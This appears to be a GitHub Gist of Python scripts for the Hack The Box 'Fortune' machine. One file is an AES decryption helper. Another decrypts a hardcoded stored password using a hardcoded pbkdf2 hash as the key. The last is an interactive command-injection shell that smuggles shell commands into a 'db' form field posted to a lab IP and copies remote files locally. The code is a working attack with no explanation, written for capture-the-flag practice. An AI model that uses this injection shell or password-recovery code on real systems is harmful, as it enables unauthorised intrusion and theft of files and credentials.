Last active
August 12, 2019 15:34
-
-
Save MilyMilo/0160e1a19c87bb214bd3d53c1b18755c to your computer and use it in GitHub Desktop.
HTB Fortune Scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import division | |
| import base64 | |
| import hashlib | |
| import os | |
| import six | |
| from cryptography.hazmat.backends import default_backend | |
| from cryptography.hazmat.primitives.ciphers import Cipher | |
| from cryptography.hazmat.primitives.ciphers.algorithms import AES | |
| from cryptography.hazmat.primitives.ciphers.modes import CFB8 | |
| padding_string = b'}' | |
| iv_size = AES.block_size // 8 | |
| def decrypt(ciphertext, key): | |
| """ | |
| Decrypt the AES encrypted string. | |
| Parameters: | |
| ciphertext -- Encrypted string with AES method. | |
| key -- key to decrypt the encrypted string. | |
| """ | |
| ciphertext = base64.b64decode(ciphertext) | |
| iv = ciphertext[:iv_size] | |
| cipher = Cipher(AES(pad(key)), CFB8(iv), default_backend()) | |
| decryptor = cipher.decryptor() | |
| return decryptor.update(ciphertext[iv_size:]) + decryptor.finalize() | |
| def pad(key): | |
| """Add padding to the key.""" | |
| if isinstance(key, six.text_type): | |
| key = key.encode() | |
| # Key must be maximum 32 bytes long, so take first 32 bytes | |
| key = key[:32] | |
| # If key size is 16, 24 or 32 bytes then padding is not required | |
| if len(key) in (16, 24, 32): | |
| return key | |
| # Add padding to make key 32 bytes long | |
| return key.ljust(32, padding_string) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| password = "utUU0jkamCZDmqFLOrAuPjFxL0zp8zWzISe5MF0GY/l8Silrmu3caqrtjaVjLQlvFFEgESGz" | |
| key = "$pbkdf2-sha512$25000$z9nbm1Oq9Z5TytkbQ8h5Dw$Vtx9YWQsgwdXpBnsa8BtO5kLOdQGflIZOQysAy7JdTVcRbv/6csQHAJCAIJT9rLFBawClFyMKnqKNL5t3Le9vg" | |
| import crypto | |
| out = crypto.decrypt(password, key) | |
| print(out) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from bs4 import BeautifulSoup | |
| import requests | |
| import os | |
| dir = "/home/appsrv/fortune" | |
| file = "" | |
| while True: | |
| cmd = input("{dir}: ".format(dir=dir)) | |
| base_cmd = cmd | |
| if base_cmd[0:2] == "cd": | |
| dir = base_cmd[3:] | |
| continue | |
| if base_cmd[0:4] == "copy": | |
| file = cmd[5:] | |
| cmd = "cat {file}".format(file=file) | |
| payload = {"db": "pwn; cd {dir}; {cmd}".format(dir=dir, cmd=cmd)} | |
| res = requests.post("http://10.10.10.127/select", data=payload) | |
| s = BeautifulSoup(res.text, features="lxml") | |
| out = s.find("pre").text.strip() | |
| if base_cmd[0:4] == "copy": | |
| filename = file.split("/")[-1] | |
| with open(os.path.join("fortune_out", filename), "w+") as f: | |
| f.write(out + "\n") | |
| continue |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment